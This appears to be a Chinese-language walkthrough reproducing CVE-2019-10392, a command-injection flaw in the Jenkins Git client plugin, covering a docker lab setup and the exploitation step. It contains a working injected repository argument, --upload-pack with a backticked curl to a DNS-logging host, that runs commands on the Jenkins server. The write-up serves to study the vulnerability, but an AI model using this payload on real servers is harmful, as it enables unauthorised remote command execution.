您好,登錄后才能下訂單哦!
本篇文章給大家分享的是有關(guān)Jenkins Git client插件RCE漏洞CVE-2019-10392復現(xiàn)示例分析,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。
0x00 簡介
Jenkins是一個開源軟件項目,是基于Java開發(fā)的一種持續(xù)集成工具,用于監(jiān)控持續(xù)重復的工作,旨在提供一個開放易用的軟件平臺,使軟件的持續(xù)集成變成可能。
0x01 漏洞概述
Git客戶端插件中的系統(tǒng)命令執(zhí)行漏洞,這是以允許具有Job/Configure權(quán)限的攻擊者在Jenkins主服務器上執(zhí)行任意系統(tǒng)命令作為Jenkins進程正在運行的OS用戶的方式實現(xiàn)命令執(zhí)行。
0x02 影響范圍
Git client Plugin <= 2.8.4
0x03 環(huán)境搭建
在線環(huán)境獲取:
將本文轉(zhuǎn)發(fā)至朋友圈截圖發(fā)至公眾號內(nèi)
自行搭建:
使用docker進行搭建
docker search Jenkinsdocker pull jenkins/jenkinsdocker run -d -p 8080:8080 -p 50000:50000 jenkins/jenkins
等待1~2分鐘后(啟動較慢),瀏覽器訪問ip:8080進入環(huán)境
docker exec -it 2d0c55ad015c /bin/bash #進入容器cat /var/jenkins_home/secrets/initialAdminPassword #獲取密碼
輸入密碼后繼續(xù)下一步,安裝推薦的插件,這個安裝過程要花比較長的時間,15~20分鐘
繼續(xù)下一步,創(chuàng)建一個管理員
繼續(xù)下一步,就進入了Jenkins主頁面
系統(tǒng)管理 -- 管理用戶 -- 新建用戶,創(chuàng)建一個user賬戶
然后進入:系統(tǒng)管理 -- 全局安全配置,為user賬戶配置如下權(quán)限
下載漏洞版本的插件(推薦安裝的都是官網(wǎng)的最新版本)
git客戶端:
http://updates.jenkins-ci.org/download/plugins/git-client/2.8.2/git-client.hpi
git插件:
http://updates.jenkins-ci.org/download/plugins/git/3.12.0/git.hpi
然后進入:系統(tǒng)管理 -- 插件管理 -- 高級,將兩個插件上傳
都上傳完后點擊下圖的‘安裝完成后重啟Jenkins’即可重新啟動服務
0x04 漏洞利用
重啟后,登錄user賬戶
新建任務 -- 流水線
確定后,點擊流水線
選擇以下選項,輸入Poc(使用dnslog檢測):
--upload-pack="`curl ysp8lf.dnslog.cn`"
查看dnslog,檢測到流量
以上就是Jenkins Git client插件RCE漏洞CVE-2019-10392復現(xiàn)示例分析,小編相信有部分知識點可能是我們?nèi)粘9ぷ鲿姷交蛴玫降?。希望你能通過這篇文章學到更多知識。更多詳情敬請關(guān)注億速云行業(yè)資訊頻道。
免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。